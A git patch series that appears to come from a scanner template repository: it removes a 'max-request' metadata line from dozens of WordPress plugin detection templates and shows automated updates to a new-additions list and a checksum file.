a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 8fdf9f494dd55f174fb74baadd89aa77fe753a18 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 05:01:44 +0000 Subject: [PATCH 0127/1090] Auto Generated New Template Addition List [Tue Sep 5 05:01:44 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ced817657b..dd4ea13ad2 100644 --- a/.new-additions +++ b/.new-additions @@ -22,6 +22,7 @@ http/misconfiguration/ecology-info-leak.yaml http/misconfiguration/nacos/nacos-create-user.yaml http/misconfiguration/php-debugbar-exposure.yaml http/takeovers/lemlist-takeover.yaml +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml http/technologies/wordpress/plugins/wp-seopress.yaml http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml From cd260b292b36725427dfbcbb04a67372e1d407ad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 05:01:59 +0000 Subject: [PATCH 0128/1090] Auto Generated Templates Checksum [Tue Sep 5 05:01:59 UTC 2023] :robot: --- templates-checksum.txt | 418 +++++++++++++++++++++-------------------- 1 file changed, 210 insertions(+), 208 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f1c77a8174..9ceedfebf8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -385,7 +385,7 @@ helpers/wordpress/plugins/broken-link-checker.txt:53847c48faeb5e255ebcdd1a4762a5 helpers/wordpress/plugins/child-theme-configurator.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 -helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:e32deb17fa798d4d0cc07e70e2873e34cf81c0d3 +helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:a81ab9d3802932cf95bd34d57f3554c73559eeae helpers/wordpress/plugins/cloudflare.txt:95b4f085ec6b3a33a23781c7cfda78c317e5dca1 helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 helpers/wordpress/plugins/coblocks.txt:049a35ad82b9c914dc50f602563d1e37e06ef9a6 @@ -455,7 +455,7 @@ helpers/wordpress/plugins/jetpack.txt:90db4c034fdf9f384fce435b9f9b57de9906c45c helpers/wordpress/plugins/kadence-blocks.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa helpers/wordpress/plugins/leadin.txt:4ea6749184af2616dda4c6d36597b267338ca299 -helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:eb7b3babdf22a684d0ea8660470e63f0a4a6f2d6 +helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4b37c29fba8babd654bfb5f26219010dd1bf03f8 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:a2246273db175b4d951c8ae09a9b87d55b422463 helpers/wordpress/plugins/loco-translate.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 @@ -484,6 +484,7 @@ helpers/wordpress/plugins/password-protected.txt:5f099bc6f95ad230bf3e17b9745270e helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 +helpers/wordpress/plugins/pinterest-for-woocommerce.txt:2a9b0f4a3fc4e928b28f1e9507e9ccf7de813bd5 helpers/wordpress/plugins/pixelyoursite.txt:d8e23ca5790b46b3d6b48f23efe069ee480120e3 helpers/wordpress/plugins/polylang.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0 helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7 @@ -502,7 +503,7 @@ helpers/wordpress/plugins/seo-by-rank-math.txt:26d3be19886d8968091c5568da94385ea helpers/wordpress/plugins/sg-cachepress.txt:4b3ee513f62e0368db5c1409e926fc99b39d00c8 helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4 helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3 -helpers/wordpress/plugins/shortpixel-image-optimiser.txt:cf9ef6e8abc5b568cc3511b30b4eea50bb878ccf +helpers/wordpress/plugins/shortpixel-image-optimiser.txt:4f019608acb19092704e77b812587f75a4baed71 helpers/wordpress/plugins/simple-custom-post-order.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/siteguard.txt:b26853e0fc7b2e0fccdc39c5fe508249d0d5d410 @@ -519,11 +520,11 @@ helpers/wordpress/plugins/taxonomy-terms-order.txt:d2a825593d236a4bdf4eeecfe093c helpers/wordpress/plugins/the-events-calendar.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 -helpers/wordpress/plugins/translatepress-multilingual.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 +helpers/wordpress/plugins/translatepress-multilingual.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:67c391fdae5d34abde64a1732ca064007569702b helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d -helpers/wordpress/plugins/updraftplus.txt:9441b7902302a4ce4ac4a62bf4918e281a22e6c8 +helpers/wordpress/plugins/updraftplus.txt:ef52ef5de56c32d1410d7eb141c26ff4e9fbe4b4 helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c4743d helpers/wordpress/plugins/user-role-editor.txt:e4dcf50721abd61e4b9d3234623bdf059936514b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 @@ -538,7 +539,7 @@ helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:85e58fba8dcfa56b29939775178a4af11946316b helpers/wordpress/plugins/woocommerce-payments.txt:f761ee50908e2e01cb058b4b2f46366c4d288e93 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 -helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:cc1586242918f22469f32e7d30bae9a88f411c48 +helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/woocommerce-services.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 helpers/wordpress/plugins/woocommerce.txt:758e3631d239f1de32442015f0033cc31a84dcec helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da @@ -1867,7 +1868,7 @@ http/cves/2021/CVE-2021-32305.yaml:e32d24d73a7793fbdcb86ef264be1c04d5b90750 http/cves/2021/CVE-2021-32618.yaml:24714214b07b23b56635d3af3f4385a709fccc1e http/cves/2021/CVE-2021-32682.yaml:dbc567cddbe5ace9da05bca3347c054cf2430886 http/cves/2021/CVE-2021-32789.yaml:7df42a6f562ca789097d9c835bfca04e3ca52da3 